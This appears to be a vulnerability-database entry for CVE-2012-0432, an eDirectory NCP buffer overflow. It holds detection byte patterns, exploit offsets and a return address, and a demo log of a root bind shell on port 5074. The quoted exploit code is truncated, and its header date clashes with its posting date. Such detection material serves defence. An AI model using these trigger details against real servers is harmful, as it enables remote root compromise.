CVE-2012-0432
Published: 2012-12-25
Priority: P2 (68) · Severity: critical · CVSS 2.0 base score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: available (see the Exploit-DB and Metasploit entries below)
EPSS: 58.70% (99.0th percentile)
Stack-based buffer overflow in the Novell NCP implementation in NetIQ eDirectory 8.8.7.x before 8.8.7.2 allows remote attackers to have an unspecified impact via unknown vectors.
Affected (2 ranges):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microfocus | edirectory | — | — |
| microfocus | edirectory | — | — |
Detection & IOCs (extracted from sources)

Byte patterns:
- 44 6d 64 54 00 00 00 17 00 00 00 01 00 00 00 00 11 11 00 00 00 00 00
- 44 6d 64 54 ... 22 22 01 ff 00 00 17 00 a7 18 90 90 50
- 74 4e 63 50 00 00 00 10 33 33
Detection guidance:
- Detect NCP service connection requests on TCP port 524 containing the magic byte sequence 0x44 0x6d 0x64 0x54 (NCP TCP id) followed by a Keyed Object Login request (FunctionCode 0x17, SubFunctionCode 0x18) with an oversized ClientNameLen field (0x50) — indicative of the exploit trigger.
- Alert on NCP TCP responses containing the 'service connection reply' marker bytes 0x74 0x4e 0x63 0x50 followed by 0x33 0x33 on TCP port 524, which the exploit validates before sending the overflow payload.
- Monitor for unexpected outbound or inbound TCP connections on port 5074 from the eDirectory/ndsd host, which is the bind-shell port spawned by the exploit payload.
- Detect NCP request packets on TCP/524 where the total packet length field (bytes 4-7) is 0x000001a0 (416 bytes) or larger combined with FunctionCode 0x17 and SubFunctionCode 0x18, indicating a malformed/oversized Keyed Object Login request.
- Look for NOP sled patterns (0x90 sequences) within NCP payloads on TCP/524, as the exploit fills the overflow buffer with 0x90 (NOP) bytes before the shellcode.

Notes:
- The Metasploit module targets specifically 'Novell eDirectory 8.8.7 v20701.33 / SLES 10 SP3' with Ret=0x080a4697 and Offset=58; other patch levels use different offsets.
- The vulnerability is fixed in eDirectory 8.8 SP7 Patch 2 (build 20703.00); systems running that version or later are not affected.
No detection rules found.
Exploit-DB
Novell eDirectory 8 - Remote Buffer Overflow (Metasploit)
exploitdb · 2013-01-24
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Class header and the 'Name' key were garbled in the indexed copy; they are
# restored here from the standard Metasploit3 module skeleton.
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell eDirectory 8 Buffer Overflow',
      'Description'    => %q{
        This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The
        vulnerability exists in the ndsd daemon, specifically in the NCP service, while
        parsing a specially crafted Keyed Object Login request. It allows remote code
        execution with root privileges.
      },
      'Author'         =>
        [
          'David Klein', # Vulnerability Discovery
          'Gary Nilson', # Exploit
          'juan vazquez' # Metasploit mo
```
Exploit-DB
Novell NCP - Remote Command Execution
exploitdb · 2013-01-18 · CVSS 10.0 [CRITICAL]
---
In the interest of full-disclosure, here is a remote exploit for the
vulnerability found by David Klein:
Demonstration:

```text
Novell NCP Pre-Auth Remote Stack Buffer Overflow
Connecting to host [127.0.0.1]...
Connected!
Sending message #1 (23 bytes)
74 4e 63 50 00 00 00 10 33 33 00 0a 00 00 00 00
Response #1 is valid, continue exploitation
Received response connection number 0a
Sending payload (190 bytes)...
[...omitted...]
190 bytes sent
Attempting to connect to shell at port 5074...
Sleeping for 10 seconds...
Success!
pwd
/var/opt/novell/instance0/data/dib
id
uid=0(root) gid=0(root) groups=0(root)
exit
Connection closed
```
********** BEGIN EXPLOIT **********

```c
/*
 * Novell NCP Pre-Auth Remote Root Exploit
 * Written by Gary Nilson 11-17-2013
 *
 * Overv
```
Metasploit
Novell eDirectory 8 Buffer Overflow
metasploit
This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The vulnerability exists in the ndsd daemon, specifically in the NCP service, while parsing a specially crafted Keyed Object Login request. It allows remote code execution with root privileges.
No writeups or analysis indexed.